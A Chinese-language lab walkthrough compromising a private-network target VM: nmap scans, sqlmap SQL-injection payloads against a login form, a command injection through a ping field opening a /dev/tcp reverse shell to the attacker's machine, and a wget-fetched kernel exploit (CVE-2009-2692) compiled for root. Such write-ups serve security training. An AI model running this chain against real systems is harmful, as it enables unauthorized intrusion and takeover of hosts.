目录
信息收集
1.存活扫描
nmap -sn 192.168.229.1/24
nmap -sn 192.168.229.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 20:58 EST
Nmap scan report for 192.168.229.69 //发现靶机
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Nmap scan report for 192.168.229.73
Host is up.
MAC Address: 1A:A0:01:1C:61:2B (Unknown)
Nmap scan report for 192.168.229.85
Host is up (0.21s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.136
Host is up (0.12s latency).
MAC Address: 58:1C:F8:E0:85:B7 (Intel Corporate)
Nmap scan report for 192.168.229.247
Host is up (0.00026s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.69 seconds
2.端口扫描
nmap -sT -p- -Pn 192.168.229.69
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:12 EST
Nmap scan report for 192.168.229.69
Host is up (0.0038s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
655/tcp open tinc
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 3.92 seconds
3.服务扫描
nmap -sT -sV -sC--version-all -O -p 22,80,111,443,631,655,3306 192.168.229.69
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:15 EST
Nmap scan report for 192.168.229.69
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 652/udp status
|_ 100024 1 655/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2023-12-07T00:06:16+00:00; -2h09m29s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp open ipp CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
655/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -2h09m29s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds
WEB渗透:
访问页面发现一个登录页面:
4.SQL注入
这里我们先利用burp suite判断是post传参类型,借助数据包,利用sqlmap一把梭。
将数据包写入 1.txt,sqlmap -r
指定文件来注入
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sqlmap -r '1.txt' --level 5 --risk 3
___
__H__
___ ___[']_____ ___ ___ {1.7.8#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:10:51 /2023-12-06/
[22:10:51] [INFO] parsing HTTP request from '1.txt'
[22:10:51] [INFO] testing connection to the target URL
[22:10:51] [INFO] testing if the target URL content is stable
[22:10:52] [INFO] target URL content is stable
[22:10:52] [INFO] testing if POST parameter 'uname' is dynamic
[22:10:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[22:10:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:10:52] [INFO] testing for SQL injection on POST parameter 'uname'
-------------
Parameter: psw (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uname=admin&psw=-3635' OR 6390=6390-- ZtJm&btnLogin=Login
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: uname=admin&psw=rooot' AND 4175=BENCHMARK(5000000,MD5(0x4c677766))-- LVAp&btnLogin=Login
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uname=-3300' OR 1388=1388-- yOfD&psw=rooot&btnLogin=Login
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: uname=admin' AND 3078=BENCHMARK(5000000,MD5(0x6c69784a))-- YDPQ&psw=rooot&btnLogin=Login
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: uname, type: Single quoted string (default)
[1] place: POST, parameter: psw, type: Single quoted string
[q] Quit
>
拿到payload了,这里sqlmap注入完成给我们提供了3个payload,随便拿一个进行登录尝试,发现登录成功,是一个ping功能的命令
5.远程命令执行(绕过)
发现执行成功
我们尝试反弹shell,
kali:nc -lvvp 4444
web:127.0.0.1 && /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1
6.提权
我们尝试内核提权,searchsploit 查询下载漏洞,开启http服务,靶机下载并执行。
searchsploit linux 2.6 centos
searchsploit -m 9479.c
python3 -m http.server 8080
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit linux 2.6 centos
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation ( | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation | linux_x86-64/local/45516.c
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit -m 9479.c
Exploit: Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
URL: https://www.exploit-db.com/exploits/9479
Path: /usr/share/exploitdb/exploits/linux/local/9479.c
Codes: CVE-2009-2692, OSVDB-56992
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/9479.c
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
靶机下载脚本命令并执行
wget http://192.168.229.234:8080/9479.c
gcc -o 1 9479.c
sh-3.00# wget http://192.168.229.234:8080/9479.c
--20:54:16-- http://192.168.229.234:8080/9479.c
=> `9479.c'
Connecting to 192.168.229.234:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,378 (3.3K) [text/x-csrc]
0K ... 100% 247.81 MB/s
20:54:16 (247.81 MB/s) - `9479.c' saved [3378/3378]
sh-3.00# ls
9479.c
sh-3.00# gcc -o 1 9479.c
9479.c:130:28: warning: no newline at end of file
sh-3.00# ls
1
9479.c
sh-3.00# ./1
[-] check ur uid
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00